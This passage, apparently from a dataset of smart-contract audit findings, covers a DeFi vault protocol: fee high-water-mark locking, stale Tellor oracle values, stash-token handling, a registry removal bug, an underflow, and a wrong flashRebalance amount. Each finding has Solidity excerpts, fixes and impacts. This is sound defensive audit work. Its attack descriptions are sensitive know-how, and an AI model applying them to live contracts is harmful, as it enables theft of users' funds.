(Temporarily)\\n`performanceFeeBps` is 10%\\nIn this case, the debt value of DV's shares will increase, which will cause LMPVault's debt to increase. This event caused the `currentNavPerShare` to increase to `1.4` temporarily.\\nSomeone calls the permissionless `updateDebtReporting` function. Thus, the profit will be `0.4 ETH * 0.5 Shares = 0.2 ETH`, which is small due to the number of shares (0.5 shares) in the LMPVault at this point. The fee will be `0.02 ETH` (~40 USD). 
Thus, the fee earned is very little and almost negligible.\\nAt the end of the function, the `navPerShareHighMark` will be set to `1.4`, and the highest NAV/Share will be locked forever. After some time, the price of the LP tokens fell back to its expected price range, and the `currentNavPerShare` fell to around `1.05`. No fee will be collected from this point onwards unless the NAV/Share is raised above `1.4`.\\nIt might take a long time to reach the `1.4` threshold, or in the worst case, the spike is temporary, and it will never reach `1.4` again. So, when the NAV/Share of the LMPVault is 1.0 to `1.4`, the protocol only collects `0.02 ETH` (~40 USD), which is too little.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, 
block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\nчIssue Malicious users could lock in the NAV/Share of the DV to cause the loss of fees\\nConsider implementing a sophisticated off-chain algorithm to determine the right time to lock the `navPerShareHighMark` and/or restrict the access to the `updateDebtReporting` function to only protocol-owned addresses.чLoss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.ч```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n -Malicious users could use back old valuesчmediumчPer the Teller's User 
Checklist, it is possible that a potential attacker could go back in time to find a desired value in the event that a Tellor value is disputed. Following is the extract taken from the checklist:\\nEnsure that functions do not use old Tellor values\\nIn the event where a Tellor value is disputed, the disputed value is removed & previous values remain. Prevent potential attackers from going back in time to find a desired value with a check in your contracts. This repo is a great reference for integrating Tellor.\\nThe current implementation lack measure to guard against such attack.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n\\nAnyone can submit a dispute to Tellor by paying a fee. The disputed values are immediately removed upon submission, and the previous values will remain. The attacks are profitable as long as the economic gains are higher than the dispute fee. 
For instance, this can be achieved by holding large amounts of vault shares (e.g., obtained using own funds or flash-loan) to amplify the gain before manipulating the assets within it to increase the values.чUpdate the affected function as per the recommendation in Teller's User Checklist.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n \\n// Add the line below\\n if (timestampRetrieved > lastStoredTimestamps[tellorInfo.queryId]) {\\n// Add the line below\\n lastStoredTimestamps[tellorInfo.queryId] = timestampRetrieved;\\n// Add the line below\\n lastStoredPrices[tellorInfo.queryId] = value;\\n// Add the line below\\n } else {\\n// Add the line below\\n value = lastStoredPrices[tellorInfo.queryId]\\n// Add the line below\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\nчMalicious users could manipulate the price returned by the oracle to be higher or lower than expected. 
The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.ч```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? 
DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n -Incorrect handling of Stash Tokens within the `ConvexRewardsAdapter._claimRewards()`чmediumчThe primary task of the `ConvexRewardAdapter._claimRewards()` function revolves around claiming rewards for Convex/Aura staked LP tokens.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a \"balanceOf()\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for \"stash tokens\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n\\nAn intriguing aspect of this function's logic lies in its 
management of \"stash tokens\" from AURA staking. The check to identify whether `rewardToken[i]` is a stash token involves attempting to invoke `IERC20(rewardTokens[i]).totalSupply()`. If the returned total supply value is `0`, the implementation assumes the token is a stash token and bypasses it. However, this check is flawed since the total supply of stash tokens can indeed be non-zero. For instance, at this address, the stash token has `totalSupply = 150467818494283559126567`, which is definitely not zero.\\nThis misstep in checking can potentially lead to a Denial-of-Service (DOS) situation when calling the `claimRewards()` function. This stems from the erroneous attempt to call the `balanceOf` function on stash tokens, which lack the `balanceOf()` method. Consequently, such incorrect calls might incapacitate the destination vault from claiming rewards from AURA, resulting in protocol losses.чTo accurately determine whether a token is a stash token, it is advised to perform a low-level `balanceOf()` call to the token and subsequently validate the call's success.чThe `AuraRewardsAdapter.claimRewards()` function could suffer from a Denial-of-Service (DOS) scenario.\\nThe destination vault's ability to claim rewards from AURA staking might be hampered, leading to protocol losses.ч```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a \"balanceOf()\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n 
}\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for \"stash tokens\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n -`navPerShareHighMark` not reset to 1.0чmediumчThe LMPVault will only collect fees if the current NAV (currentNavPerShare) is more than the last NAV (effectiveNavPerShareHighMark).\\n```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n\\nAssume the current LMPVault state is as follows:\\ntotalAssets = 15 WETH\\ntotalSupply = 10 shares\\nNAV/share = 1.5\\neffectiveNavPerShareHighMark = 1.5\\nAlice owned all the remaining shares in the vault, and she decided to withdraw all her 10 shares. As a result, the `totalAssets` and `totalSupply` become zero. 
It was found that when all the shares have been exited, the `effectiveNavPerShareHighMark` is not automatically reset to 1.0.\\nAssume that at some point later, other users started to deposit into the LMPVault, and the vault invests the deposited WETH to profitable destination vaults, resulting in the real/actual NAV rising from 1.0 to 1.49 over a period of time.\\nThe system is designed to collect fees when there is a rise in NAV due to profitable investment from sound rebalancing strategies. However, since the `effectiveNavPerShareHighMark` has been set to 1.5 previously, no fee is collected when the NAV rises from 1.0 to 1.49, resulting in a loss of fee.чConsider resetting the `navPerShareHighMark` to 1.0 whenever a vault has been fully exited.\\n```\\nfunction _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n) internal virtual returns (uint256) {\\n..SNIP..\\n _burn(owner, shares);\\n \\n// Add the line below\\n if (totalSupply() == 0) navPerShareHighMark = MAX_FEE_BPS;\\n\\n emit Withdraw(msg.sender, receiver, owner, returnedAssets, shares);\\n\\n _baseAsset.safeTransfer(receiver, returnedAssets);\\n\\n return returnedAssets;\\n}\\n```\\nчLoss of fee. 
Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.ч```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n -Vault cannot be added back into the vault registryчmediumчWhen removing a vault from the registry, all states related to the vaults such as the `_vaults`, `_assets`, `_vaultsByAsset` are cleared except the `_vaultsByType` state.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, \"vaultAddress\");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n\\nThe uncleared `_vaultsByType` state will cause the `addVault` function to revert when trying to add the vault back into the registry even though the vault does not exist in the registry 
anymore.\\n```\\n if (!_vaultsByType[vaultType].add(vaultAddress)) revert VaultAlreadyExists(vaultAddress);\\n```\\nчClear the `_vaultsByType` state when removing the vault from the registry.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, \"vaultAddress\");\\n// Add the line below\\n ILMPVault vault = ILMPVault(vaultAddress);\\n// Add the line below\\n bytes32 vaultType = vault.vaultType();\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n// Add the line below\\n if (!_vaultsByType[vaultType].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\nчThe `addVault` function is broken in the edge case when the updater tries to add the vault back into the registry after removing it. 
It affects all the operations of the protocol that rely on the vault registry.ч```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, \"vaultAddress\");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n -LMPVault.updateDebtReporting could underflow because of subtraction before additionчmediumч`debt = totalDebt - prevNTotalDebt + afterNTotalDebt` where prevNTotalDebt equals `(destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1)` and the key to finding a scenario for underflow starts by noting that each value deducted from totalDebt is calculated as `cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up)`\\nLMPDebt\\n```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n\\nLet: `totalDebt = destInfo.currentDebt = destInfo.debtBasis = cachedCurrentDebt = cachedDebtBasis = 11` `totalSupply = destInfo.ownedShares = cachedDvShares = 10`\\nThat way: `cachedCurrentDebt * 1 / cachedDvShares = 1.1` but totalDebtBurn would be rounded up to 2\\n`sharesToBurn` could easily be 1 if there was a loss that changes the ratio from `1:1.1` to `1:1`. 
Therefore `currentDvDebtValue = 10 * 1 = 10`\\n```\\nif (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n}\\n\\n// Shouldn't pull more than we want\\n// Or, we're not in profit so we limit the pull\\nif (currentDvDebtValue < maxAssetsToPull) {\\n maxAssetsToPull = currentDvDebtValue;\\n}\\n\\n// Calculate the portion of shares to burn based on the assets we need to pull\\n// and the current total debt value. These are destination vault shares.\\nsharesToBurn = currentDvShares.mulDiv(maxAssetsToPull, currentDvDebtValue, Math.Rounding.Up);\\n```\\n\\nSteps\\ncall redeem 1 share and previewRedeem request 1 `maxAssetsToPull`\\n2 debt would be burn\\nTherefore totalDebt = 11-2 = 9\\ncall another redeem 1 share and request another 1 `maxAssetsToPull`\\n2 debts would be burn again and\\ntotalDebt would be 7, but prevNTotalDebt = 11 * 8 // 10 = 8\\nUsing 1, 10 and 11 are for illustration and the underflow could occur in several other ways. E.g if we had used `100,001`, `1,000,010` and `1,000,011` respectively.чAdd before subtracting. ETH in circulation is not enough to cause an overflow.\\n```\\n- debt = totalDebt - prevNTotalDebt + afterNTotalDebt\\n+ debt = totalDebt + afterNTotalDebt - prevNTotalDebt\\n```\\nч_updateDebtReporting could underflow and break a very important core functionality of the protocol. updateDebtReporting is so critical that funds could be lost if it doesn't work. 
Funds could be lost both when the vault is in profit or at loss.\\nIf in profit, users would want to call updateDebtReporting so that they get more asset for their shares (based on the profit).\\nIf in loss, the whole vault asset is locked and withdrawals won't be successful because the Net Asset Value is not supposed to reduce by such action (noNavDecrease modifier). Net Asset Value has reduced because the loss would reduce totalDebt, but the only way to update the totalDebt record is by calling updateDebtReporting. And those impacted the most are those with large funds. The bigger the fund, the more NAV would decrease by withdrawals.ч```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n -LMPVault: DoS when `feeSink` balance hits `perWalletLimit`чmediumч`_collectFees` mints shares to `feeSink`.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n\\n`_mint` calls `_beforeTokenTransfer` internally to check if the target wallet exceeds `perWalletLimit`.\\n```\\nfunction _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override whenNotPaused {\\n // rest of code.\\n if (balanceOf(to) + amount > perWalletLimit) {\\n revert OverWalletLimit(to);\\n }\\n}\\n```\\n\\n`_collectFees` function will revert if `balanceOf(feeSink) + fee shares > perWalletLimit`. 
`updateDebtReporting`, `rebalance` and `flashRebalance` call `_collectFees` internally so they will be non-functional.чAllow `feeSink` to exceed `perWalletLimit`.ч`updateDebtReporting`, `rebalance` and `flashRebalance` won't be working if `feeSink` balance hits `perWalletLimit`.ч```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n -Incorrect amount given as input to `_handleRebalanceIn` when `flashRebalance` is calledчmediumчThe issue occurs in the `flashRebalance` function below:\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming \"In\", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get \"before\" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the \"out\" assets\\n // and get our \"in\" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != 
keccak256(\"ERC3156FlashBorrower.onFlashLoan\")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nAs we can see from the code above, the function executes a flashloan in order to receive th tokenIn amount which should be the difference between `tokenInBalanceAfter` (balance of the contract after the flashloan) and `tokenInBalanceBefore` (balance of the contract before the flashloan) : `tokenInBalanceAfter` - `tokenInBalanceBefore`.\\nBut when calling the `_handleRebalanceIn` function the wrong deposit amount is given as input, as the total balance `tokenInBalanceAfter` is used instead of the received amount `tokenInBalanceAfter` - tokenInBalanceBefore.\\nBecause the `_handleRebalanceIn` function is supposed to deposit the input amount to the destination vault, this error can result in sending a larger amount of funds to DV then what was intended or this error can cause a DOS of the `flashRebalance` function (due to the insufficient amount error when performing the transfer to DV), all of this will make the rebalance operation fail (or not done correctely) which can have a negative impact on the LMPVault.чUse the correct received tokenIn amount `tokenInBalanceAfter - tokenInBalanceBefore` as input to the `_handleRebalanceIn` function :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n 
IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming \"In\", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get \"before\" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the \"out\" assets\\n // and get our \"in\" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(\"ERC3156FlashBorrower.onFlashLoan\")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit Use `tokenInBalanceAfter - tokenInBalanceBefore` as input\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter - tokenInBalanceBefore);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\nчSee summaryч```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes 
calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming \"In\", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get \"before\" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the \"out\" assets\\n // and get our \"in\" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(\"ERC3156FlashBorrower.onFlashLoan\")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n -OOG / unexpected reverts due to incorrect usage of staticcall.чmediumчThe function `checkReentrancy` in `BalancerUtilities.sol` is used to check if the balancer contract has been re-entered or not. It does this by doing a `staticcall` on the pool contract and checking the return value. 
